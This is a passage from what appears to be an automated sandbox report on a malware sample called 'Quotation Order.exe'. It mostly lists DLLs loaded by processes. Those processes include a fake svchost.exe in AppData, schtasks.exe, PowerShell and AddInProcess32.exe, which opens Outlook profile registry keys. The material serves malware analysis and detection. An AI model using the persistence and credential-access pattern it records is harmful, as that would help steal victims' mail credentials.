Source: C:\Windows\System32\svchost.exe | Section loaded: fltlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bcd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: storageusage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: aphostservice.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: networkhelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userdataplatformhelperutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mccspal.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vaultcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dmcfgutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dmcmnutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dmxmlhelputils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: inproclogger.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: synccontroller.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pimstore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: aphostclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: accountaccessor.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mccsengineshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cemapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userdatalanguageutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userdatatypehelperutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: phoneutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: systemeventsusererclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\timeout.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ntmarta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: msasn1.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: wersvc.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: windowsperformancerecordercontrol.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: weretw.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: faultrep.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: dbghelp.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: dbgcore.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Users\user\Desktop\Quotation Order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Quotation Order.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: Quotation Order.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Quotation Order.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Quotation Order.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: System.Core.pdbmscorlib.dllSystem.dll@ source: WER46C7.tmp.dmp.46.dr
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
